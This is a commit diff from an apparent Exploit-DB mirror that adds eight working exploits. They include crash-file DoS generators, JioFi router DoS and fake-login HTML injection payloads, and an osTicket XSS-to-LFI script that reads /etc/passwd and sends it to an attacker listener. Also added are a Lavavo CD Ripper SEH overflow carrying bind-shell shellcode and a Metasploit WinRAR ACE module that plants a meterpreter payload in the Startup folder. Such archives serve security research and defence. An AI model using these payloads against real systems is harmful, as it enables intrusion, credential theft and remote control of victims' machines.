bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2019-04-26

Browse source 
8 changes to exploits/shellcodes

HeidiSQL 10.1.0.5464 - Denial of Service (PoC)
Backup Key Recovery 2.2.4 - Denial of Service (PoC)
JioFi 4G M2S 1.0.2 - Denial of Service
AnMing MP3 CD Burner 2.0 - Denial of Service (PoC)
Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)
RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)
JioFi 4G M2S 1.0.2 - 'mask' Cross-Site Scripting
osTicket 1.11 - Cross-Site Scripting / Local File Inclusion
This commit is contained in:
Offensive Security 2019-04-26 05:02:02 +00:00
parent 64a6267162
commit fae7f6fe32
9 changed files with 606 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

66
exploits/hardware/dos/46752.txt Normal file
View file

@ -0,0 +1,66 @@
# Exploit Title: cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices allows a DoS (Hang) via the mask POST parameter
# Exploit Author: Vikas Chaudhary
# Date: 21-01-2019
# Vendor Homepage: https://www.jio.com/
# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29
# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router
# Category: Hardware
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
# Tested on: Windows 10 X64- Firefox-65.0
# CVE-2019-7439
***********************************************************************
## Vulnerability Description :- A denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
----------------------------------------
# Proof Of Concept:
1- First Open BurpSuite
2- Make Intercept on
3 -Go to your Wifi Router's Gateway in Browser [i.e http://192.168.225.1 ]
4-Capture the data and then Spider the Host
5- Now You find a Link like this [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ]
6- Send it to repeter Now you will find parameter like this [ Page=GetWANInfo&mask=0&token=0 ]
7-Vulnerable parameter is => mash
8-Paste this PAYLOD in mask parameter and then show Response in browser
Payload =>
<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>
9-Now it will show => {"commit":"Socket Connect Error"}
10-- It Means Router is Completely Stopped ,
----------------------------------------
Vulnerable URL => Post Based => http://192.168.225.1/cgi-bin/qcmap_web_cgi => mask parameter
-----------------------------------------
Solution:-
You have to Remove your battery and then again insert it to make Normal.
-----------------------------------------------------------------------------------
REQUEST
------------
POST /cgi-bin/qcmap_web_cgi HTTP/1.1
Host: 192.168.225.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.225.1/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 167
Connection: close
Page=GetWANInfo&mask=<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>&token=0
****************************
RESPONSE
----------
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
X-Frame-Options: SAMEORIGIN
connection: close
Content-Type: text/html
Content-Length: 33
Date: Mon, 21 Jan 2019 18:17:34 GMT
Server: lighttpd/1.4.35
{"commit":"Socket Connect Error"}
---------------------------------------------------------------------------------------------------------------

63
exploits/hardware/webapps/46751.txt Normal file
View file

@ -0,0 +1,63 @@
# Exploit Title: cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter.
# Exploit Author: Vikas Chaudhary
# Date: 21-01-2019
# Vendor Homepage: https://www.jio.com/
# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29
# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router
# Category: Hardware
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
# Tested on: Windows 10 X64- Firefox-65.0
# CVE-2019-7438
***********************************************************************
## Vulnerability Description => HTML injection is an attack that is similar to Cross-site Scripting (XSS). While in the XSS vulnerability the attacker can inject and execute Javascript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust.
----------------------------------------
# Proof Of ConceptoC
1- First Open BurpSuite
2- Make Intercept on
3 -Go to your Wifi Router's Gateway in Browser [i.e http://192.168.225.1 ]
4-Capture the data and then Spider the Host
5- Now You find a Link like like this [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ]
6- Send it to repeter Now you will find parameter like this [ Page=GetWANInfo&mask=0&token=0 ]
7-Vulnerable parameter is => mash
8-Paste this PAYLOAD in mask parameter and then show Response in browser
Payload =>
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>
9- You will see a fake Login page on the screen -
----------------------------------------------------------------------------------
Vulnerable URL => Post Based => http://192.168.225.1/cgi-bin/qcmap_web_cgi => mask parameter -
----------------------------------------------------------------------------------
REQUEST
-------------------
POST /cgi-bin/qcmap_web_cgi HTTP/1.1
Host: 192.168.225.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.225.1/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 550
Connection: close
Page=GetWANInfo&mask=<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>&token=0
****************************
RESPONSE
-----------------
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
X-Frame-Options: SAMEORIGIN
connection: close
Content-Type: text/html
Content-Length: 1167
Date: Mon, 21 Jan 2019 18:02:07 GMT
Server: lighttpd/1.4.35
{"Page":"GetWANInfo","Mask":"<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>","wan_status":"On","total_data_used":"10005648","wan_operation_mode":"NAT","wan_connection_mode":"DHCP","wan_mac":"40:C8:CB:07:2C:8A","host_name":"JMR1140-072C8A","multi_pdn":"Disabled","ipv4_addr":"10.153.220.101","ipv4_subnet":"255.255.255.252","ipv4_gateway":"10.153.220.102","ipv4_primary":"49.45.0.1","ipv4_secondary":"0.0.0.0","ipv6_addr":"2409:4060:218e:b511:89ec:3214:def1:f75b","ipv6_subnet":"64","ipv6_gateway":"fe80::c9b3:928a:5eca:7e1c","ipv6_primary":"2405:200:800::1","ipv6_secondary":"::","channel":"automatic","packet_loss":"0 / 0","total_data_used_dlink":"5.11 MB","total_data_used_ulink":"4.37 MB"}
---------------------------------------------------------------------------------------------------------------

107
exploits/php/webapps/46753.txt Normal file
View file

@ -0,0 +1,107 @@
# Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File
Inclusion
# Date: 09.04.2019
# Exploit Author: Özkan Mustafa Akkuş (AkkuS) @ehakkus
# Contact: https://pentest.com.tr
# Vendor Homepage: https://osticket.com
# Software Link: https://github.com/osTicket/osTicket
# References: https://github.com/osTicket/osTicket/pull/4869
# https://pentest.com.tr/exploits/osTicket-v1-11-XSS-to-LFI.html
# Version: v1.11
# Category: Webapps
# Tested on: XAMPP for Linux
# Description: This is exploit proof of concept as XSS attempt can
# lead to an LFI (Local File Inclusion) attack at osTicket.
##################################################################
# PoC
# There are two different XSS vulnerabilities in the "Import"
field on the Agent Panel - User Directory field. This vulnerability
causes a different vulnerability. The attacker can run the malicious
JS file that he uploads in the XSS vulnerability. Uploaded JS files
can be called clear text. Therefore, attackers do not have to use
a different server to perform an attack. Then it is possible to
create "Local File Inclusion" vulnerability too.
The attacker can upload a JS file as follows.
------------------------------------------------------------------
function readTextFile(file)
{
var rawFile = new XMLHttpRequest();
rawFile.open("GET", file, false);
rawFile.onreadystatechange = function ()
{
if(rawFile.readyState === 4)
{
if(rawFile.status === 200 || rawFile.status == 0)
{
var allText = rawFile.responseText;
allText.src = 'http://localhost:8001' +
rawFile.responseText;
document.body.appendChild(allText);
}
}
}
rawFile.send(null);
}
readTextFile("/etc/passwd");
------------------------------------------------------------------
# Smilar JS File Link;
/upload/file.php?key=y3cxcoxqv8r3miqczzj5ar8rhm1bhcbm
&expires=1554854400&signature=be5cea87c37d7971e0c54164090a391066ecbaca&id=36"
After this process, we can run the JS file in XSS vulnerability.
# Our First Request for XSS to LFI;
------------------------------------------------------------------
POST /upload/scp/users.php?do=import-users
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------[]
-----------------------------[]
Content-Disposition: form-data; name="__CSRFToken__"
8f6f85b8d76218112a53f909692f3c4ae7768b39
-----------------------------[]
Content-Disposition: form-data; name="pasted"
-----------------------------[]
Content-Disposition: form-data; name="import"; filename="users-20190408.csv"
Content-Type: text/csv
<script src="
http://localhost/4/osTicket-v1.11/upload/file.php?key=y3cxcoxqv8r3miqczzj5ar8rhm1bhcbm&expires=1554854400&signature=be5cea87c37d7971e0c54164090a391066ecbaca&id=36
"></script>
-----------------------------[]--
# Our Second Request for XSS to LFI;
------------------------------------------------------------------
POST /upload/scp/ajax.php/users/import HTTP/1.1
Host: localhost
__CSRFToken__=8f6f85b8d76218112a53f909692f3c4ae7768b39&pasted=%3Cscript+src%3D%22http%3A%2F%2Flocalhost%2F4%2FosTicket-v1.11%2Fupload%2Ffile.php%3Fkey%3Dy3cxcoxqv8r3miqczzj5ar8rhm1bhcbm%26expires%3D1554854400%26signature%3Dbe5cea87c37d7971e0c54164090a391066ecbaca%26id%3D36%22%3E%3C%2Fscript%3E&undefined=Import+Users
------------------------------------------------------------------
# After sending XSS requests,
# When the attacker listens to port 8001, he/she will receive a request as
follows.
root@AkkuS:~# python -m SimpleHTTPServer 8001
Serving HTTP on 0.0.0.0 port 8001 ...
127.0.0.1 - - [09/Apr/2019 11:54:42] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [09/Apr/2019 11:54:42] "GET
/root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin...[More]

24
exploits/windows/dos/46749.py Executable file
View file

@ -0,0 +1,24 @@
#Exploit Title: HeidiSQL Portable 10.1.0.5464 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-04-24
#Vendor Homepage: https://www.heidisql.com/
#Software Link: https://www.heidisql.com/downloads/releases/HeidiSQL_10.1_64_Portable.zip
#Tested Version: 10.1.0.5464
#Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: HeidiSQL_Portable_10.1.0.5464.py
#2.- Open bd_p.txt and copy content to clipboard
#2.- Open HeidiSQL
#3.- Select "New"
#4.- In Network type select "Microsoft SQL Server (TCP/IP)"
#5.- Enable "Prompt for credentials" > click on "Open"
#6.- In Login select "Password" and Paste ClipBoard
#6.- Click on "Login"
#7.- Crashed
cod = "\x41" * 2000
f = open('bd_p.txt', 'w')
f.write(cod)
f.close()

23
exploits/windows/dos/46750.py Executable file
View file

@ -0,0 +1,23 @@
#Exploit Title: Backup Key Recovery 2.2.4 - 'Name' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-04-24
#Vendor Homepage: www.nsauditor.com
#Software Link: http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
#Tested Version: 2.2.4
#Tested on: Windows 7 x64 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: Backup_key_rec_2.2.4.py
#2.- Open backup.txt and copy content to clipboard
#3.- Open Backup Key Recovery
#4.- Select "Register"
#5.- In "Name" paste Clipboard
#6.- In Key type "test"
#7.- Click "Ok"
#8.- Crarshed
cod = "\x41" * 300
f = open('backup.txt', 'w')
f.write(cod)
f.close()

29
exploits/windows/dos/46754.py Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: AnMing MP3 CD Burner 2.0 Local Dos Exploit
# Date: 25.04.2019
# Vendor Homepage:http://www.ddz1977.com/
# Software Link: https://files.downloadnow.com/s/software/10/56/16/74/anming_setup.zip?token=1556228877_063f2dc0aed064ee5d13374d8509661c&fileName=anming_setup.zip
# Exploit Author: Achilles
# Tested Version: 2.0
# Tested on: Windows 7 x64 Sp1
# Windows XP x86 Sp3
# 1.- Run python code :AnMing.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Anming.exe and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'Your Name and Registration Code'
# 5.- Click 'OK'and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

65
exploits/windows/local/46755.py Executable file
View file

@ -0,0 +1,65 @@
# Exploit Title: Lavavo CD Ripper 4.20 Local Seh Exploit
# Date: 25.04.2019
# Vendor Homepage:https://www.lavavosoftware.com
# Software Link: https://lavavo-cd-ripper.jaleco.com/download
# Exploit Author: Achilles
# Tested Version: 4.20
# Tested on: Windows XP SP3 EN
# Windows 7 Sp1 x64
# 1.- Run python code : Lavavo.py
# 2.- Open EVIL.txt and copy content to Clipboard
# 3.- Open LavavoCDRipper.exe and click UNLOCK.
# 4.- Paste the Content of EVIL.txt into the 'License Activation Name'
# 5.- License Key 123456789
# 6.- Click 'Unlock Now' and you will have a bind shell port 3110.
#!/usr/bin/env python
import struct
buffer = "\x41" * 300
nseh = "\xeb\x06\x90\x90" #jmp short 6
seh = struct.pack('<L',0x1003157d) #libsndfile.dll
nops = "\x90" * 20
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
#badchars "\x00\x0a\x0d"
shellcode = ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"
"\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8"
"\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b"
"\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07"
"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5"
"\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f"
"\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02"
"\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59"
"\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7"
"\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb"
"\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87"
"\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01"
"\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7"
"\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45"
"\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49"
"\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1"
"\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9"
"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c"
"\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64"
"\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38"
"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3"
"\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0"
"\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86"
"\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e"
"\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7"
"\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4"
"\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef"
"\x77\x03\x31\x3a")
pad ="C" * (6000 - len(buffer) - len(nseh+seh) - len(nops) -len(shellcode))
payload = buffer + nseh + seh + nops + shellcode + pad
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

221
exploits/windows/local/46756.rb Executable file
View file

@ -0,0 +1,221 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
#
# TODO: add other non-payload files
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'RARLAB WinRAR ACE Format Input Validation Remote Code Execution',
'Description' => %q{
In WinRAR versions prior to and including 5.61, there is path traversal vulnerability
when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename
field is manipulated with specific patterns, the destination (extraction) folder is
ignored, thus treating the filename as an absolute path. This module will attempt to
extract a payload to the startup folder of the current user. It is limited such that
we can only go back one folder. Therefore, for this exploit to work properly, the user
must extract the supplied RAR file from one folder within the user profile folder
(e.g. Desktop or Downloads). User restart is required to gain a shell.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nadav Grossman', # exploit discovery
'Imran E. Dawoodjee <imrandawoodjee.infosec@gmail.com>' # Metasploit module
],
'References' =>
[
['CVE', '2018-20250'],
['EDB', '46552'],
['BID', '106948'],
['URL', 'https://research.checkpoint.com/extracting-code-execution-from-winrar/'],
['URL', 'https://apidoc.roe.ch/acefile/latest/'],
['URL', 'http://www.hugi.scene.org/online/coding/hugi%2012%20-%20coace.htm'],
],
'Platform' => 'win',
'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
'Targets' =>
[
[ 'RARLAB WinRAR <= 5.61', {} ]
],
'DisclosureDate' => 'Feb 05 2019',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.ace']),
OptString.new('CUSTFILE', [ false, 'User-defined custom payload', '']),
OptString.new('FILE_LIST', [false, 'List of other non-payload files to add', ''])
])
end
def exploit
ace_header = ""
# All hex values are already in little endian.
# HEAD_CRC: Lower 2 bytes of CRC32 of 49 bytes of header after HEAD_TYPE.
# The bogus value for HEAD_CRC will be replaced later.
ace_header << "AA"
# HEAD_SIZE: header size. \x31\x00 says 49.
ace_header << "\x31\x00"
# HEAD_TYPE: header type. Archive header is 0.
ace_header << "\x00"
# HEAD_FLAGS: header flags
ace_header << "\x00\x90"
# ACE magic
ace_header << "\x2A\x2A\x41\x43\x45\x2A\x2A"
# VER_EXTRACT: version needed to extract archive
ace_header << "\x14"
# VER_CREATED: version used to create archive
ace_header << "\x14"
# HOST_CREATED: host OS for ACE used to create archive
ace_header << "\x02"
# VOLUME_NUM: which volume of a multi-volume archive?
ace_header << "\x00"
# TIME_CREATED: date and time in MS-DOS format
ace_header << "\x10\x18\x56\x4E"
# RESERVED1
ace_header << "\x97\x4F\xF6\xAA\x00\x00\x00\x00"
# AV_SIZE: advert size
ace_header << "\x16"
# AV: advert which shows if registered/unregistered.
# Full advert says "*UNREGISTERED VERSION*"
ace_header << "\x2A\x55\x4E\x52\x45\x47\x49\x53\x54\x45\x52\x45\x44\x20\x56\x45\x52\x53\x49\x4F\x4E\x2A"
# calculate the CRC32 of ACE header, and get the lower 2 bytes
ace_header_crc32 = crc32(ace_header[4, ace_header.length]).to_s(16)
ace_header_crc16 = ace_header_crc32.last(4).to_i(base=16)
ace_header[0,2] = [ace_header_crc16].pack("v")
# start putting the ACE file together
ace_file = ""
ace_file << ace_header
# create headers and append file data after header
unless datastore["FILE_LIST"].empty?
print_status("Using the provided list of files @ #{datastore["FILE_LIST"]}...")
File.binread(datastore["FILE_LIST"]).each_line do |file|
file = file.chomp
file_header_and_data = create_file_header_and_data(file, false, false)
ace_file << file_header_and_data
end
end
# autogenerated payload
if datastore["CUSTFILE"].empty?
payload_filename = ""
# 72 characters
payload_filename << "C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
# 6 characters
payload_filename << rand_text_alpha(6)
# 4 characters
payload_filename << ".exe"
payload_file_header = create_file_header_and_data(payload_filename, true, false)
# user-defined payload
else
print_status("Using a custom payload: #{::File.basename(datastore["CUSTFILE"])}")
payload_filename = ""
# 72 characters
payload_filename << "C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
# n characters
payload_filename << ::File.basename(datastore["CUSTFILE"])
payload_file_header = create_file_header_and_data(payload_filename, true, true)
end
vprint_status("Payload filename: #{payload_filename.from(72)}")
# append payload file header and the payload itself into the rest of the data
ace_file << payload_file_header
# create the file
file_create(ace_file)
end
# The CRC implementation used in ACE does not take the last step in calculating CRC32.
# That is, it does not flip the bits. Therefore, it can be easily calculated by taking
# the negative bitwise OR of the usual CRC and then subtracting one from it. This is due to
# the way the bitwise OR works in Ruby: unsigned integers are not a thing in Ruby, so
# applying a bitwise OR on an integer will produce its negative + 1.
def crc32(data)
table = Zlib.crc_table
crc = 0xffffffff
data.unpack('C*').each { |b|
crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
}
-(~crc) - 1
end
# create file headers for each file to put into the output ACE file
def create_file_header_and_data(path, is_payload, is_custom_payload)
#print_status("Length of #{path}: #{path.length}")
if is_payload and is_custom_payload
file_data = File.binread(path.from(72))
elsif is_payload and !is_custom_payload
file_data = generate_payload_exe
else
file_data = File.binread(File.basename(path))
end
file_data_crc32 = crc32(file_data).to_i
# HEAD_CRC: Lower 2 bytes of CRC32 of the next bytes of header after HEAD_TYPE.
# The bogus value for HEAD_CRC will be replaced later.
file_header = ""
file_header << "AA"
# HEAD_SIZE: file header size.
if is_payload
file_header << [31 + path.length].pack("v")
else
file_header << [31 + ::File.basename(path).length].pack("v")
end
# HEAD_TYPE: header type is 1.
file_header << "\x01"
# HEAD_FLAGS: header flags. \x01\x80 is ADDSIZE|SOLID.
file_header << "\x01\x80"
# PACK_SIZE: size when packed.
file_header << [file_data.length].pack("V")
#print_status("#{file_data.length}")
# ORIG_SIZE: original size. Same as PACK_SIZE since no compression is *truly* taking place.
file_header << [file_data.length].pack("V")
# FTIME: file date and time in MS-DOS format
file_header << "\x63\xB0\x55\x4E"
# ATTR: DOS/Windows file attribute bit field, as int, as produced by the Windows GetFileAttributes() API.
file_header << "\x20\x00\x00\x00"
# CRC32: CRC32 of the compressed file
file_header << [file_data_crc32].pack("V")
# Compression type
file_header << "\x00"
# Compression quality
file_header << "\x03"
# Parameter for decompression
file_header << "\x0A\x00"
# RESERVED1
file_header << "\x54\x45"
# FNAME_SIZE: size of filename string
if is_payload
file_header << [path.length].pack("v")
else
# print_status("#{::File.basename(path).length}")
file_header << [::File.basename(path).length].pack("v")
end
#file_header << [path.length].pack("v")
# FNAME: filename string. Empty for now. Fill in later.
if is_payload
file_header << path
else
file_header << ::File.basename(path)
end
#print_status("Calculating other_file_header...")
file_header_crc32 = crc32(file_header[4, file_header.length]).to_s(16)
file_header_crc16 = file_header_crc32.last(4).to_i(base=16)
file_header[0,2] = [file_header_crc16].pack("v")
file_header << file_data
end
end

8
files_exploits.csv
View file

@ -6398,6 +6398,10 @@ id,file,description,date,author,type,platform,port
46743,exploits/linux/dos/46743.txt,"systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit",2019-04-23,"Google Security Research",dos,linux,
46744,exploits/linux/dos/46744.c,"Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition",2019-04-23,"Google Security Research",dos,linux,
46745,exploits/linux/dos/46745.txt,"Linux - 'page->_refcount' Overflow via FUSE",2019-04-23,"Google Security Research",dos,linux,
46749,exploits/windows/dos/46749.py,"HeidiSQL 10.1.0.5464 - Denial of Service (PoC)",2019-04-25,"Victor Mondragón",dos,windows,
46750,exploits/windows/dos/46750.py,"Backup Key Recovery 2.2.4 - Denial of Service (PoC)",2019-04-25,"Victor Mondragón",dos,windows,
46752,exploits/hardware/dos/46752.txt,"JioFi 4G M2S 1.0.2 - Denial of Service",2019-04-25,"Vikas Chaudhary",dos,hardware,
46754,exploits/windows/dos/46754.py,"AnMing MP3 CD Burner 2.0 - Denial of Service (PoC)",2019-04-25,Achilles,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10438,6 +10442,8 @@ id,file,description,date,author,type,platform,port
46737,exploits/windows/local/46737.py,"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)",2019-04-22,"Dino Covotsos",local,windows,
46742,exploits/windows/local/46742.txt,"Ross Video DashBoard 8.5.1 - Insecure Permissions",2019-04-23,LiquidWorm,local,windows,
46747,exploits/windows/local/46747.txt,"VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation",2019-04-24,"Google Security Research",local,windows,
46755,exploits/windows/local/46755.py,"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)",2019-04-25,Achilles,local,windows,
46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -41181,3 +41187,5 @@ id,file,description,date,author,type,platform,port
46738,exploits/php/webapps/46738.html,"74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)",2019-04-22,ax8,webapps,php,80
46739,exploits/php/webapps/46739.html,"Msvod 10 - Cross-Site Request Forgery (Change User Information)",2019-04-22,ax8,webapps,php,80
46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80
46751,exploits/hardware/webapps/46751.txt,"JioFi 4G M2S 1.0.2 - 'mask' Cross-Site Scripting",2019-04-25,"Vikas Chaudhary",webapps,hardware,
46753,exploits/php/webapps/46753.txt,"osTicket 1.11 - Cross-Site Scripting / Local File Inclusion",2019-04-25,AkkuS,webapps,php,80

Can't render this file because it is too large.